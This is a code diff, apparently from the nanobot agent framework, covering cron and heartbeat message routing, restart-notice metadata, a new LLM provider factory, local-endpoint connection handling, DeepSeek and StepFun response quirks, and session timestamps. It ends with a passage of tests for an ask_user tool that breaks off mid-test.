OutboundMessage(
|
||||
channel=job.payload.channel or "cli",
|
||||
chat_id=job.payload.to,
|
||||
content=response,
|
||||
metadata=dict(job.payload.channel_meta),
|
||||
),
|
||||
record=True,
|
||||
session_key=job.payload.session_key,
|
||||
)
|
||||
return response
|
||||
|
||||
cron.on_job = on_cron_job
|
||||
@ -808,12 +816,22 @@ def _run_gateway(
|
||||
return resp.content if resp else ""
|
||||
|
||||
async def on_heartbeat_notify(response: str) -> None:
|
||||
"""Deliver a heartbeat response to the user's channel."""
|
||||
from nanobot.bus.events import OutboundMessage
|
||||
"""Deliver a heartbeat response to the user's channel.
|
||||
|
||||
In addition to publishing the outbound message, this injects the
|
||||
delivered text as an assistant turn into the *target channel's*
|
||||
session. Without this, a user reply on the channel (e.g. "Sure")
|
||||
lands in a session that has no context about the heartbeat message
|
||||
and the agent cannot follow through.
|
||||
"""
|
||||
channel, chat_id = _pick_heartbeat_target()
|
||||
if channel == "cli":
|
||||
return # No external channel available to deliver to
|
||||
await bus.publish_outbound(OutboundMessage(channel=channel, chat_id=chat_id, content=response))
|
||||
|
||||
await _deliver_to_channel(
|
||||
OutboundMessage(channel=channel, chat_id=chat_id, content=response),
|
||||
record=True,
|
||||
)
|
||||
|
||||
hb_cfg = config.gateway.heartbeat
|
||||
heartbeat = HeartbeatService(
|
||||
@ -1016,6 +1034,7 @@ def agent(
|
||||
unified_session=config.agents.defaults.unified_session,
|
||||
disabled_skills=config.agents.defaults.disabled_skills,
|
||||
session_ttl_minutes=config.agents.defaults.session_ttl_minutes,
|
||||
consolidation_ratio=config.agents.defaults.consolidation_ratio,
|
||||
tools_config=config.tools,
|
||||
)
|
||||
restart_notice = consume_restart_notice_from_env()
|
||||
|
||||
@ -28,7 +28,11 @@ async def cmd_stop(ctx: CommandContext) -> OutboundMessage:
|
||||
async def cmd_restart(ctx: CommandContext) -> OutboundMessage:
|
||||
"""Restart the process in-place via os.execv."""
|
||||
msg = ctx.msg
|
||||
set_restart_notice_to_env(channel=msg.channel, chat_id=msg.chat_id)
|
||||
set_restart_notice_to_env(
|
||||
channel=msg.channel,
|
||||
chat_id=msg.chat_id,
|
||||
metadata=dict(msg.metadata or {}),
|
||||
)
|
||||
|
||||
async def _do_restart():
|
||||
await asyncio.sleep(1)
|
||||
|
||||
@ -90,6 +90,13 @@ class AgentDefaults(Base):
|
||||
validation_alias=AliasChoices("idleCompactAfterMinutes", "sessionTtlMinutes"),
|
||||
serialization_alias="idleCompactAfterMinutes",
|
||||
) # Auto-compact idle threshold in minutes (0 = disabled)
|
||||
consolidation_ratio: float = Field(
|
||||
default=0.5,
|
||||
ge=0.1,
|
||||
le=0.95,
|
||||
validation_alias=AliasChoices("consolidationRatio"),
|
||||
serialization_alias="consolidationRatio",
|
||||
) # Consolidation target ratio (0.5 = 50% of budget retained after compression)
|
||||
dream: DreamConfig = Field(default_factory=DreamConfig)
|
||||
|
||||
|
||||
|
||||
@ -109,6 +109,12 @@ class CronService:
|
||||
deliver=j["payload"].get("deliver", False),
|
||||
channel=j["payload"].get("channel"),
|
||||
to=j["payload"].get("to"),
|
||||
channel_meta=(
|
||||
j["payload"].get("channelMeta")
|
||||
or j["payload"].get("channel_meta")
|
||||
or {}
|
||||
),
|
||||
session_key=j["payload"].get("sessionKey") or j["payload"].get("session_key"),
|
||||
),
|
||||
state=CronJobState(
|
||||
next_run_at_ms=j.get("state", {}).get("nextRunAtMs"),
|
||||
@ -210,6 +216,8 @@ class CronService:
|
||||
"deliver": j.payload.deliver,
|
||||
"channel": j.payload.channel,
|
||||
"to": j.payload.to,
|
||||
"channelMeta": j.payload.channel_meta,
|
||||
"sessionKey": j.payload.session_key,
|
||||
},
|
||||
"state": {
|
||||
"nextRunAtMs": j.state.next_run_at_ms,
|
||||
@ -379,6 +387,8 @@ class CronService:
|
||||
channel: str | None = None,
|
||||
to: str | None = None,
|
||||
delete_after_run: bool = False,
|
||||
channel_meta: dict | None = None,
|
||||
session_key: str | None = None,
|
||||
) -> CronJob:
|
||||
"""Add a new job."""
|
||||
_validate_schedule_for_add(schedule)
|
||||
@ -395,6 +405,8 @@ class CronService:
|
||||
deliver=deliver,
|
||||
channel=channel,
|
||||
to=to,
|
||||
channel_meta=channel_meta or {},
|
||||
session_key=session_key,
|
||||
),
|
||||
state=CronJobState(next_run_at_ms=_compute_next_run(schedule, now)),
|
||||
created_at_ms=now,
|
||||
|
||||
@ -27,6 +27,8 @@ class CronPayload:
|
||||
deliver: bool = False
|
||||
channel: str | None = None # e.g. "whatsapp"
|
||||
to: str | None = None # e.g. phone number
|
||||
channel_meta: dict = field(default_factory=dict) # channel-specific routing (e.g. Slack thread_ts)
|
||||
session_key: str | None = None # original session key for correct session recording
|
||||
|
||||
|
||||
@dataclass
|
||||
|
||||
@ -84,6 +84,7 @@ class Nanobot:
|
||||
unified_session=defaults.unified_session,
|
||||
disabled_skills=defaults.disabled_skills,
|
||||
session_ttl_minutes=defaults.session_ttl_minutes,
|
||||
consolidation_ratio=defaults.consolidation_ratio,
|
||||
tools_config=config.tools,
|
||||
)
|
||||
return cls(loop)
|
||||
@ -119,62 +120,6 @@ class Nanobot:
|
||||
|
||||
def _make_provider(config: Any) -> Any:
|
||||
"""Create the LLM provider from config (extracted from CLI)."""
|
||||
from nanobot.providers.base import GenerationSettings
|
||||
from nanobot.providers.registry import find_by_name
|
||||
from nanobot.providers.factory import make_provider
|
||||
|
||||
model = config.agents.defaults.model
|
||||
provider_name = config.get_provider_name(model)
|
||||
p = config.get_provider(model)
|
||||
spec = find_by_name(provider_name) if provider_name else None
|
||||
backend = spec.backend if spec else "openai_compat"
|
||||
|
||||
if backend == "azure_openai":
|
||||
if not p or not p.api_key or not p.api_base:
|
||||
raise ValueError("Azure OpenAI requires api_key and api_base in config.")
|
||||
elif backend == "openai_compat" and not model.startswith("bedrock/"):
|
||||
needs_key = not (p and p.api_key)
|
||||
exempt = spec and (spec.is_oauth or spec.is_local or spec.is_direct)
|
||||
if needs_key and not exempt:
|
||||
raise ValueError(f"No API key configured for provider '{provider_name}'.")
|
||||
|
||||
if backend == "openai_codex":
|
||||
from nanobot.providers.openai_codex_provider import OpenAICodexProvider
|
||||
|
||||
provider = OpenAICodexProvider(default_model=model)
|
||||
elif backend == "github_copilot":
|
||||
from nanobot.providers.github_copilot_provider import GitHubCopilotProvider
|
||||
|
||||
provider = GitHubCopilotProvider(default_model=model)
|
||||
elif backend == "azure_openai":
|
||||
from nanobot.providers.azure_openai_provider import AzureOpenAIProvider
|
||||
|
||||
provider = AzureOpenAIProvider(
|
||||
api_key=p.api_key, api_base=p.api_base, default_model=model
|
||||
)
|
||||
elif backend == "anthropic":
|
||||
from nanobot.providers.anthropic_provider import AnthropicProvider
|
||||
|
||||
provider = AnthropicProvider(
|
||||
api_key=p.api_key if p else None,
|
||||
api_base=config.get_api_base(model),
|
||||
default_model=model,
|
||||
extra_headers=p.extra_headers if p else None,
|
||||
)
|
||||
else:
|
||||
from nanobot.providers.openai_compat_provider import OpenAICompatProvider
|
||||
|
||||
provider = OpenAICompatProvider(
|
||||
api_key=p.api_key if p else None,
|
||||
api_base=config.get_api_base(model),
|
||||
default_model=model,
|
||||
extra_headers=p.extra_headers if p else None,
|
||||
spec=spec,
|
||||
)
|
||||
|
||||
defaults = config.agents.defaults
|
||||
provider.generation = GenerationSettings(
|
||||
temperature=defaults.temperature,
|
||||
max_tokens=defaults.max_tokens,
|
||||
reasoning_effort=defaults.reasoning_effort,
|
||||
)
|
||||
return provider
|
||||
return make_provider(config)
|
||||
|
||||
112
nanobot/providers/factory.py
Normal file
112
nanobot/providers/factory.py
Normal file
@ -0,0 +1,112 @@
|
||||
"""Create LLM providers from config."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
from dataclasses import dataclass
|
||||
from pathlib import Path
|
||||
|
||||
from nanobot.config.schema import Config
|
||||
from nanobot.providers.base import GenerationSettings, LLMProvider
|
||||
from nanobot.providers.registry import find_by_name
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class ProviderSnapshot:
|
||||
provider: LLMProvider
|
||||
model: str
|
||||
context_window_tokens: int
|
||||
signature: tuple[object, ...]
|
||||
|
||||
|
||||
def make_provider(config: Config) -> LLMProvider:
|
||||
"""Create the LLM provider implied by config."""
|
||||
model = config.agents.defaults.model
|
||||
provider_name = config.get_provider_name(model)
|
||||
p = config.get_provider(model)
|
||||
spec = find_by_name(provider_name) if provider_name else None
|
||||
backend = spec.backend if spec else "openai_compat"
|
||||
|
||||
if backend == "azure_openai":
|
||||
if not p or not p.api_key or not p.api_base:
|
||||
raise ValueError("Azure OpenAI requires api_key and api_base in config.")
|
||||
elif backend == "openai_compat" and not model.startswith("bedrock/"):
|
||||
needs_key = not (p and p.api_key)
|
||||
exempt = spec and (spec.is_oauth or spec.is_local or spec.is_direct)
|
||||
if needs_key and not exempt:
|
||||
raise ValueError(f"No API key configured for provider '{provider_name}'.")
|
||||
|
||||
if backend == "openai_codex":
|
||||
from nanobot.providers.openai_codex_provider import OpenAICodexProvider
|
||||
|
||||
provider = OpenAICodexProvider(default_model=model)
|
||||
elif backend == "azure_openai":
|
||||
from nanobot.providers.azure_openai_provider import AzureOpenAIProvider
|
||||
|
||||
provider = AzureOpenAIProvider(
|
||||
api_key=p.api_key,
|
||||
api_base=p.api_base,
|
||||
default_model=model,
|
||||
)
|
||||
elif backend == "github_copilot":
|
||||
from nanobot.providers.github_copilot_provider import GitHubCopilotProvider
|
||||
|
||||
provider = GitHubCopilotProvider(default_model=model)
|
||||
elif backend == "anthropic":
|
||||
from nanobot.providers.anthropic_provider import AnthropicProvider
|
||||
|
||||
provider = AnthropicProvider(
|
||||
api_key=p.api_key if p else None,
|
||||
api_base=config.get_api_base(model),
|
||||
default_model=model,
|
||||
extra_headers=p.extra_headers if p else None,
|
||||
)
|
||||
else:
|
||||
from nanobot.providers.openai_compat_provider import OpenAICompatProvider
|
||||
|
||||
provider = OpenAICompatProvider(
|
||||
api_key=p.api_key if p else None,
|
||||
api_base=config.get_api_base(model),
|
||||
default_model=model,
|
||||
extra_headers=p.extra_headers if p else None,
|
||||
spec=spec,
|
||||
)
|
||||
|
||||
defaults = config.agents.defaults
|
||||
provider.generation = GenerationSettings(
|
||||
temperature=defaults.temperature,
|
||||
max_tokens=defaults.max_tokens,
|
||||
reasoning_effort=defaults.reasoning_effort,
|
||||
)
|
||||
return provider
|
||||
|
||||
|
||||
def provider_signature(config: Config) -> tuple[object, ...]:
|
||||
"""Return the config fields that affect the primary LLM provider."""
|
||||
model = config.agents.defaults.model
|
||||
defaults = config.agents.defaults
|
||||
return (
|
||||
model,
|
||||
defaults.provider,
|
||||
config.get_provider_name(model),
|
||||
config.get_api_key(model),
|
||||
config.get_api_base(model),
|
||||
defaults.max_tokens,
|
||||
defaults.temperature,
|
||||
defaults.reasoning_effort,
|
||||
defaults.context_window_tokens,
|
||||
)
|
||||
|
||||
|
||||
def build_provider_snapshot(config: Config) -> ProviderSnapshot:
|
||||
return ProviderSnapshot(
|
||||
provider=make_provider(config),
|
||||
model=config.agents.defaults.model,
|
||||
context_window_tokens=config.agents.defaults.context_window_tokens,
|
||||
signature=provider_signature(config),
|
||||
)
|
||||
|
||||
|
||||
def load_provider_snapshot(config_path: Path | None = None) -> ProviderSnapshot:
|
||||
from nanobot.config.loader import load_config, resolve_config_env_vars
|
||||
|
||||
return build_provider_snapshot(resolve_config_env_vars(load_config(config_path)))
|
||||
@ -3,17 +3,20 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import json
|
||||
import hashlib
|
||||
import importlib.util
|
||||
import json
|
||||
import os
|
||||
import secrets
|
||||
import string
|
||||
import time
|
||||
import uuid
|
||||
from collections.abc import Awaitable, Callable
|
||||
from ipaddress import ip_address
|
||||
from typing import TYPE_CHECKING, Any
|
||||
from urllib.parse import urlparse
|
||||
|
||||
import httpx
|
||||
import json_repair
|
||||
from loguru import logger
|
||||
|
||||
@ -159,6 +162,37 @@ _RESPONSES_FAILURE_THRESHOLD = 3
|
||||
_RESPONSES_PROBE_INTERVAL_S = 300 # 5 minutes
|
||||
|
||||
|
||||
def _is_local_endpoint(
|
||||
spec: "ProviderSpec | None",
|
||||
api_base: str | None,
|
||||
) -> bool:
|
||||
"""Return True when the endpoint is a local or LAN model server.
|
||||
|
||||
Matches either the provider spec's ``is_local`` flag or common private-
|
||||
network patterns in the base URL (localhost, 127.x, 192.168.x, 10.x,
|
||||
172.16-31.x, Docker ``host.docker.internal``).
|
||||
"""
|
||||
if spec and spec.is_local:
|
||||
return True
|
||||
if not api_base:
|
||||
return False
|
||||
raw = api_base.strip().lower()
|
||||
parsed = urlparse(raw if "://" in raw else f"//{raw}")
|
||||
try:
|
||||
host = parsed.hostname
|
||||
except ValueError:
|
||||
return False
|
||||
if host in {"localhost", "host.docker.internal"}:
|
||||
return True
|
||||
if not host:
|
||||
return False
|
||||
try:
|
||||
addr = ip_address(host)
|
||||
except ValueError:
|
||||
return False
|
||||
return addr.is_loopback or addr.is_private
|
||||
|
||||
|
||||
def _is_direct_openai_base(api_base: str | None) -> bool:
|
||||
"""Return True for direct OpenAI endpoints, not generic OpenAI-compatible gateways."""
|
||||
if not api_base:
|
||||
@ -208,11 +242,27 @@ class OpenAICompatProvider(LLMProvider):
|
||||
if extra_headers:
|
||||
default_headers.update(extra_headers)
|
||||
|
||||
# Local model servers (Ollama, llama.cpp, vLLM) often close idle
|
||||
# HTTP connections before the client-side keepalive expires. When
|
||||
# two LLM calls happen seconds apart (e.g. heartbeat _decide then
|
||||
# process_direct), the second call may grab a now-dead pooled
|
||||
# connection, causing a transient APIConnectionError on every first
|
||||
# attempt. Disabling keepalive for local endpoints avoids this by
|
||||
# opening a fresh connection for each request, which is cheap on a
|
||||
# LAN. Cloud providers benefit from keepalive, so we leave the
|
||||
# default pool settings for them.
|
||||
http_client: httpx.AsyncClient | None = None
|
||||
if _is_local_endpoint(spec, effective_base):
|
||||
http_client = httpx.AsyncClient(
|
||||
limits=httpx.Limits(keepalive_expiry=0),
|
||||
)
|
||||
|
||||
self._client = AsyncOpenAI(
|
||||
api_key=api_key or "no-key",
|
||||
base_url=effective_base,
|
||||
default_headers=default_headers,
|
||||
max_retries=0,
|
||||
http_client=http_client,
|
||||
)
|
||||
|
||||
# Responses API circuit breaker: skip after repeated failures,
|
||||
@ -334,6 +384,47 @@ class OpenAICompatProvider(LLMProvider):
|
||||
clean["tool_call_id"] = map_id(clean["tool_call_id"])
|
||||
return self._enforce_role_alternation(sanitized)
|
||||
|
||||
def _drop_deepseek_incomplete_reasoning_history(
|
||||
self,
|
||||
messages: list[dict[str, Any]],
|
||||
reasoning_effort: str | None,
|
||||
) -> list[dict[str, Any]]:
|
||||
if (
|
||||
not self._spec
|
||||
or self._spec.name != "deepseek"
|
||||
or not reasoning_effort
|
||||
or reasoning_effort.lower() == "none"
|
||||
):
|
||||
return messages
|
||||
|
||||
bad_idx = None
|
||||
for idx, msg in enumerate(messages):
|
||||
if (
|
||||
msg.get("role") == "assistant"
|
||||
and msg.get("tool_calls")
|
||||
and not msg.get("reasoning_content")
|
||||
):
|
||||
bad_idx = idx
|
||||
if bad_idx is None:
|
||||
return messages
|
||||
|
||||
keep_from = None
|
||||
for idx in range(bad_idx + 1, len(messages)):
|
||||
if messages[idx].get("role") == "user":
|
||||
keep_from = idx
|
||||
break
|
||||
|
||||
if keep_from is None:
|
||||
trimmed = messages[:bad_idx]
|
||||
else:
|
||||
prefix = [msg for msg in messages[:keep_from] if msg.get("role") == "system"]
|
||||
trimmed = prefix + messages[keep_from:]
|
||||
logger.warning(
|
||||
"Dropped {} DeepSeek thinking history message(s) with incomplete reasoning_content",
|
||||
len(messages) - len(trimmed),
|
||||
)
|
||||
return trimmed
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# Build kwargs
|
||||
# ------------------------------------------------------------------
|
||||
@ -374,6 +465,10 @@ class OpenAICompatProvider(LLMProvider):
|
||||
if spec and spec.strip_model_prefix:
|
||||
model_name = model_name.split("/")[-1]
|
||||
|
||||
messages = self._drop_deepseek_incomplete_reasoning_history(
|
||||
messages,
|
||||
reasoning_effort,
|
||||
)
|
||||
kwargs: dict[str, Any] = {
|
||||
"model": model_name,
|
||||
"messages": self._sanitize_messages(self._sanitize_empty_content(messages)),
|
||||
@ -709,8 +804,8 @@ class OpenAICompatProvider(LLMProvider):
|
||||
finish_reason = str(choice0.get("finish_reason") or "stop")
|
||||
|
||||
raw_tool_calls: list[Any] = []
|
||||
# StepFun Plan: fallback to reasoning field when content is empty
|
||||
if not content and msg0.get("reasoning"):
|
||||
# StepFun: fallback to reasoning field when content is empty
|
||||
if not content and msg0.get("reasoning") and self._spec and self._spec.reasoning_as_content:
|
||||
content = self._extract_text_content(msg0.get("reasoning"))
|
||||
reasoning_content = msg0.get("reasoning_content")
|
||||
if not reasoning_content and msg0.get("reasoning"):
|
||||
@ -770,7 +865,7 @@ class OpenAICompatProvider(LLMProvider):
|
||||
finish_reason = ch.finish_reason
|
||||
if not content and m.content:
|
||||
content = m.content
|
||||
if not content and getattr(m, "reasoning", None):
|
||||
if not content and getattr(m, "reasoning", None) and self._spec and self._spec.reasoning_as_content:
|
||||
content = m.reasoning
|
||||
|
||||
tool_calls = []
|
||||
|
||||
@ -71,6 +71,11 @@ class ProviderSpec:
|
||||
# "reasoning_split" — {"reasoning_split": true/false} (MiniMax)
|
||||
thinking_style: str = ""
|
||||
|
||||
# When True, treat the "reasoning" response field as formal content
|
||||
# when "content" is empty. Only set this for providers (e.g. StepFun)
|
||||
# whose API returns the actual answer in "reasoning" instead of "content".
|
||||
reasoning_as_content: bool = False
|
||||
|
||||
@property
|
||||
def label(self) -> str:
|
||||
return self.display_name or self.name.title()
|
||||
@ -325,6 +330,7 @@ PROVIDERS: tuple[ProviderSpec, ...] = (
|
||||
display_name="Step Fun",
|
||||
backend="openai_compat",
|
||||
default_api_base="https://api.stepfun.com/v1",
|
||||
reasoning_as_content=True,
|
||||
),
|
||||
# Xiaomi MIMO (小米): OpenAI-compatible API
|
||||
ProviderSpec(
|
||||
|
||||
@ -30,6 +30,32 @@ class Session:
|
||||
metadata: dict[str, Any] = field(default_factory=dict)
|
||||
last_consolidated: int = 0 # Number of messages already consolidated to files
|
||||
|
||||
@staticmethod
|
||||
def _annotate_message_time(message: dict[str, Any], content: Any) -> Any:
|
||||
"""Expose persisted turn timestamps to the model for relative-date reasoning.
|
||||
|
||||
Annotating *every* assistant turn trains the model (via in-context
|
||||
demonstrations) to start its own replies with the same
|
||||
``[Message Time: ...]`` prefix, which leaks metadata back to the user.
|
||||
We therefore only annotate:
|
||||
|
||||
* ``user`` turns — needed so the model can pin the conversation in time.
|
||||
* proactive deliveries (``_channel_delivery=True``) — cron / heartbeat
|
||||
assistant pushes that may sit hours away from the next user reply,
|
||||
and are too infrequent to act as parroting demonstrations.
|
||||
"""
|
||||
timestamp = message.get("timestamp")
|
||||
if not timestamp or not isinstance(content, str):
|
||||
return content
|
||||
role = message.get("role")
|
||||
if role == "user":
|
||||
pass
|
||||
elif role == "assistant" and message.get("_channel_delivery"):
|
||||
pass
|
||||
else:
|
||||
return content
|
||||
return f"[Message Time: {timestamp}]\n{content}"
|
||||
|
||||
def add_message(self, role: str, content: str, **kwargs: Any) -> None:
|
||||
"""Add a message to the session."""
|
||||
msg = {
|
||||
@ -41,15 +67,24 @@ class Session:
|
||||
self.messages.append(msg)
|
||||
self.updated_at = datetime.now()
|
||||
|
||||
def get_history(self, max_messages: int = 500) -> list[dict[str, Any]]:
|
||||
def get_history(
|
||||
self,
|
||||
max_messages: int = 500,
|
||||
*,
|
||||
include_timestamps: bool = False,
|
||||
) -> list[dict[str, Any]]:
|
||||
"""Return unconsolidated messages for LLM input, aligned to a legal tool-call boundary."""
|
||||
unconsolidated = self.messages[self.last_consolidated:]
|
||||
sliced = unconsolidated[-max_messages:]
|
||||
|
||||
# Avoid starting mid-turn when possible.
|
||||
# Avoid starting mid-turn when possible, except for proactive
|
||||
# assistant deliveries that the user may be replying to.
|
||||
for i, message in enumerate(sliced):
|
||||
if message.get("role") == "user":
|
||||
sliced = sliced[i:]
|
||||
start = i
|
||||
if i > 0 and sliced[i - 1].get("_channel_delivery"):
|
||||
start = i - 1
|
||||
sliced = sliced[start:]
|
||||
break
|
||||
|
||||
# Drop orphan tool results at the front.
|
||||
@ -71,6 +106,8 @@ class Session:
|
||||
image_placeholder_text(p) for p in media if isinstance(p, str) and p
|
||||
)
|
||||
content = f"{content}\n{breadcrumbs}" if content else breadcrumbs
|
||||
if include_timestamps:
|
||||
content = self._annotate_message_time(message, content)
|
||||
entry: dict[str, Any] = {"role": message["role"], "content": content}
|
||||
for key in ("tool_calls", "tool_call_id", "name", "reasoning_content"):
|
||||
if key in message:
|
||||
|
||||
@ -2,12 +2,15 @@
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import os
|
||||
import time
|
||||
from dataclasses import dataclass
|
||||
from dataclasses import dataclass, field
|
||||
from typing import Any
|
||||
|
||||
RESTART_NOTIFY_CHANNEL_ENV = "NANOBOT_RESTART_NOTIFY_CHANNEL"
|
||||
RESTART_NOTIFY_CHAT_ID_ENV = "NANOBOT_RESTART_NOTIFY_CHAT_ID"
|
||||
RESTART_NOTIFY_METADATA_ENV = "NANOBOT_RESTART_NOTIFY_METADATA"
|
||||
RESTART_STARTED_AT_ENV = "NANOBOT_RESTART_STARTED_AT"
|
||||
|
||||
|
||||
@ -16,6 +19,7 @@ class RestartNotice:
|
||||
channel: str
|
||||
chat_id: str
|
||||
started_at_raw: str
|
||||
metadata: dict[str, Any] = field(default_factory=dict)
|
||||
|
||||
|
||||
def format_restart_completed_message(started_at_raw: str) -> str:
|
||||
@ -30,11 +34,20 @@ def format_restart_completed_message(started_at_raw: str) -> str:
|
||||
return f"Restart completed{elapsed_suffix}."
|
||||
|
||||
|
||||
def set_restart_notice_to_env(*, channel: str, chat_id: str) -> None:
|
||||
def set_restart_notice_to_env(
|
||||
*, channel: str, chat_id: str, metadata: dict[str, Any] | None = None,
|
||||
) -> None:
|
||||
"""Write restart notice env values for the next process."""
|
||||
os.environ[RESTART_NOTIFY_CHANNEL_ENV] = channel
|
||||
os.environ[RESTART_NOTIFY_CHAT_ID_ENV] = chat_id
|
||||
os.environ[RESTART_STARTED_AT_ENV] = str(time.time())
|
||||
if metadata:
|
||||
try:
|
||||
os.environ[RESTART_NOTIFY_METADATA_ENV] = json.dumps(metadata, default=str)
|
||||
except (TypeError, ValueError):
|
||||
os.environ.pop(RESTART_NOTIFY_METADATA_ENV, None)
|
||||
else:
|
||||
os.environ.pop(RESTART_NOTIFY_METADATA_ENV, None)
|
||||
|
||||
|
||||
def consume_restart_notice_from_env() -> RestartNotice | None:
|
||||
@ -42,9 +55,23 @@ def consume_restart_notice_from_env() -> RestartNotice | None:
|
||||
channel = os.environ.pop(RESTART_NOTIFY_CHANNEL_ENV, "").strip()
|
||||
chat_id = os.environ.pop(RESTART_NOTIFY_CHAT_ID_ENV, "").strip()
|
||||
started_at_raw = os.environ.pop(RESTART_STARTED_AT_ENV, "").strip()
|
||||
metadata_raw = os.environ.pop(RESTART_NOTIFY_METADATA_ENV, "").strip()
|
||||
if not (channel and chat_id):
|
||||
return None
|
||||
return RestartNotice(channel=channel, chat_id=chat_id, started_at_raw=started_at_raw)
|
||||
metadata: dict[str, Any] = {}
|
||||
if metadata_raw:
|
||||
try:
|
||||
parsed = json.loads(metadata_raw)
|
||||
except (TypeError, ValueError):
|
||||
parsed = None
|
||||
if isinstance(parsed, dict):
|
||||
metadata = parsed
|
||||
return RestartNotice(
|
||||
channel=channel,
|
||||
chat_id=chat_id,
|
||||
started_at_raw=started_at_raw,
|
||||
metadata=metadata,
|
||||
)
|
||||
|
||||
|
||||
def should_show_cli_restart_notice(notice: RestartNotice, session_id: str) -> bool:
|
||||
|
||||
241
tests/agent/test_ask_user.py
Normal file
241
tests/agent/test_ask_user.py
Normal file
@ -0,0 +1,241 @@
|
||||
import asyncio
|
||||
from unittest.mock import MagicMock
|
||||
|
||||
import pytest
|
||||
|
||||
from nanobot.agent.loop import AgentLoop
|
||||
from nanobot.agent.runner import AgentRunner, AgentRunSpec
|
||||
from nanobot.agent.tools.ask import AskUserInterrupt, AskUserTool
|
||||
from nanobot.agent.tools.base import Tool, tool_parameters
|
||||
from nanobot.agent.tools.registry import ToolRegistry
|
||||
from nanobot.agent.tools.schema import tool_parameters_schema
|
||||
from nanobot.bus.events import InboundMessage
|
||||
from nanobot.bus.queue import MessageBus
|
||||
from nanobot.providers.base import GenerationSettings, LLMResponse, ToolCallRequest
|
||||
|
||||
|
||||
def _make_provider(chat_with_retry):
|
||||
async def chat_stream_with_retry(**kwargs):
|
||||
kwargs.pop("on_content_delta", None)
|
||||
return await chat_with_retry(**kwargs)
|
||||
|
||||
provider = MagicMock()
|
||||
provider.get_default_model.return_value = "test-model"
|
||||
provider.generation = GenerationSettings()
|
||||
provider.chat_with_retry = chat_with_retry
|
||||
provider.chat_stream_with_retry = chat_stream_with_retry
|
||||
return provider
|
||||
|
||||
|
||||
def test_ask_user_tool_schema_and_interrupt():
|
||||
tool = AskUserTool()
|
||||
schema = tool.to_schema()["function"]
|
||||
|
||||
assert schema["name"] == "ask_user"
|
||||
assert "question" in schema["parameters"]["required"]
|
||||
assert schema["parameters"]["properties"]["options"]["type"] == "array"
|
||||
|
||||
with pytest.raises(AskUserInterrupt) as exc:
|
||||
asyncio.run(tool.execute("Continue?", options=["Yes", "No"]))
|
||||
|
||||
assert exc.value.question == "Continue?"
|
||||
assert exc.value.options == ["Yes", "No"]
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_runner_pauses_on_ask_user_without_executing_later_tools():
|
||||
@tool_parameters(tool_parameters_schema(required=[]))
|
||||
class LaterTool(Tool):
|
||||
called = False
|
||||
|
||||
@property
|
||||
def name(self) -> str:
|
||||
return "later"
|
||||
|
||||
@property
|
||||
def description(self) -> str:
|
||||
return "Should not run after ask_user pauses the turn."
|
||||
|
||||
async def execute(self, **kwargs):
|
||||
self.called = True
|
||||
return "later result"
|
||||
|
||||
async def chat_with_retry(**kwargs):
|
||||
return LLMResponse(
|
||||
content="",
|
||||
finish_reason="tool_calls",
|
||||
tool_calls=[
|
||||
ToolCallRequest(
|
||||
id="call_ask",
|
||||
name="ask_user",
|
||||
arguments={"question": "Install this package?", "options": ["Yes", "No"]},
|
||||
),
|
||||
ToolCallRequest(id="call_later", name="later", arguments={}),
|
||||
],
|
||||
)
|
||||
|
||||
later = LaterTool()
|
||||
tools = ToolRegistry()
|
||||
tools.register(AskUserTool())
|
||||
tools.register(later)
|
||||
|
||||
result = await AgentRunner(_make_provider(chat_with_retry)).run(AgentRunSpec(
|
||||
initial_messages=[{"role": "user", "content": "continue"}],
|
||||
tools=tools,
|
||||
model="test-model",
|
||||
max_iterations=3,
|
||||
max_tool_result_chars=16_000,
|
||||
concurrent_tools=True,
|
||||
))
|
||||
|
||||
assert result.stop_reason == "ask_user"
|
||||
assert result.final_content == "Install this package?"
|
||||
assert "ask_user" in result.tools_used
|
||||
assert later.called is False
|
||||
assert result.messages[-1]["role"] == "assistant"
|
||||
tool_calls = result.messages[-1]["tool_calls"]
|
||||
assert [tool_call["function"]["name"] for tool_call in tool_calls] == ["ask_user"]
|
||||
assert not any(message.get("name") == "ask_user" for message in result.messages)
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_ask_user_text_fallback_resumes_with_next_message(tmp_path):
|
||||
seen_messages: list[list[dict]] = []
|
||||
|
||||
async def chat_with_retry(**kwargs):
|
||||
seen_messages.append(kwargs["messages"])
|
||||
if len(seen_messages) == 1:
|
||||
return LLMResponse(
|
||||
content="",
|
||||
finish_reason="tool_calls",
|
||||
tool_calls=[
|
||||
ToolCallRequest(
|
||||
id="call_ask",
|
||||
name="ask_user",
|
||||
arguments={
|
||||
"question": "Install the optional package?",
|
||||
"options": ["Install", "Skip"],
|
||||
},
|
||||
)
|
||||
],
|
||||
)
|
||||
return LLMResponse(content="Skipped install.", usage={})
|
||||
|
||||
loop = AgentLoop(
|
||||
bus=MessageBus(),
|
||||
provider=_make_provider(chat_with_retry),
|
||||
workspace=tmp_path,
|
||||
model="test-model",
|
||||
)
|
||||
|
||||
async def on_stream(delta: str) -> None:
|
||||
pass
|
||||
|
||||
async def on_stream_end(**kwargs) -> None:
|
||||
pass
|
||||
|
||||
first = await loop._process_message(
|
||||
InboundMessage(channel="cli", sender_id="user", chat_id="direct", content="set it up"),
|
||||
on_stream=on_stream,
|
||||
on_stream_end=on_stream_end,
|
||||
)
|
||||
|
||||
assert first is not None
|
||||
assert first.content == "Install the optional package?\n\n1. Install\n2. Skip"
|
||||
assert first.buttons == []
|
||||
assert "_streamed" not in first.metadata
|
||||
|
||||
session = loop.sessions.get_or_create("cli:direct")
|
||||
assert any(message.get("role") == "assistant" and message.get("tool_calls") for message in session.messages)
|
||||
assert not any(message.get("role") == "tool" and message.get("name") == "ask_user" for message in session.messages)
|
||||
|
||||
second = await loop._process_message(
|
||||
InboundMessage(channel="cli", sender_id="user", chat_id="direct", content="Skip")
|
||||
)
|
||||
|
||||
assert second is not None
|
||||
assert second.content == "Skipped install."
|
||||
assert any(
|
||||
message.get("role") == "tool"
|
||||
and message.get("name") == "ask_user"
|
||||
and message.get("content") == "Skip"
|
||||
for message in seen_messages[-1]
|
||||
)
|
||||
assert not any(
|
||||
message.get("role") == "user" and message.get("content") == "Skip"
|
||||
for message in session.messages
|
||||
)
|
||||
assert any(
|
||||
message.get("role") == "tool"
|
||||
